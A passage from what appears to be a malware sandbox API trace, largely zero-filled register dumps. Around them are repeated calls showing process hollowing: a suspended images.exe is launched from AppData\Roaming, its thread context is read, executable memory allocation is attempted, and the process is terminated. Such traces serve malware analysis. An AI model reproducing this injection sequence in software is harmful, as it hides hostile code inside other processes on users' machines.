[83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0195.584] ReadProcessMemory (in: hProcess=0x131c0, lpBaseAddress=0x7efde008, lpBuffer=0x52def4, nSize=0x4, lpNumberOfBytesRead=0x52df44 | out: lpBuffer=0x52def4*, lpNumberOfBytesRead=0x52df44*=0x4) returned 1 [0195.584] VirtualAllocEx (hProcess=0x131c0, lpAddress=0x400000, dwSize=0x153000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0195.585] EnumProcesses (in: lpidProcess=0x24b44dc, cb=0x400, lpcbNeeded=0x52dbe8 | out: lpidProcess=0x24b44dc, lpcbNeeded=0x52dbe8) returned 1 [0195.586] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x63c) returned 0xc678 [0195.586] TerminateProcess (hProcess=0xc678, uExitCode=0xffffffff) returned 1 [0195.586] CloseHandle (hObject=0xc678) returned 1 [0195.586] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", lpCommandLine="\"{path}\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x52dc10*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x52df0c | out: lpCommandLine="\"{path}\"", lpProcessInformation=0x52df0c*(hProcess=0x2430, hThread=0xc678, dwProcessId=0x66c, dwThreadId=0x428)) returned 1 [0195.589] GetThreadContext (in: hThread=0xc678, lpContext=0x24b4ad0 | out: lpContext=0x24b4ad0*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x19770e, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0195.598] ReadProcessMemory (in: hProcess=0x2430, lpBaseAddress=0x7efde008, lpBuffer=0x52def4, nSize=0x4, lpNumberOfBytesRead=0x52df44 | out: lpBuffer=0x52def4*, lpNumberOfBytesRead=0x52df44*=0x4) returned 1 [0195.599] VirtualAllocEx (hProcess=0x2430, lpAddress=0x400000, dwSize=0x153000, flAllocationType=0x3000, flProtect=0x40) returned 0x0 [0195.600] EnumProcesses (in: lpidProcess=0x24b4e3c, cb=0x400, lpcbNeeded=0x52dbe8 | out: lpidProcess=0x24b4e3c, lpcbNeeded=0x52dbe8) returned 1 [0195.600] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x66c) returned 0x5568 [0195.600] TerminateProcess (hProcess=0x5568, uExitCode=0xffffffff) returned 1 [0195.601] CloseHandle (hObject=0x5568) returned 1 [0195.601] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", lpCommandLine="\"{path}\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x52dc10*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x52df0c | out: lpCommandLine="\"{path}\"", lpProcessInformation=0x52df0c*(hProcess=0x46fc, hThread=0x5568, dwProcessId=0x4a4, dwThreadId=0x480)) returned 1 [0195.604] GetThreadContext (in: hThread=0x5568, lpContext=0x24b5430 | out: lpContext=0x24b5430*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x19770e, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, 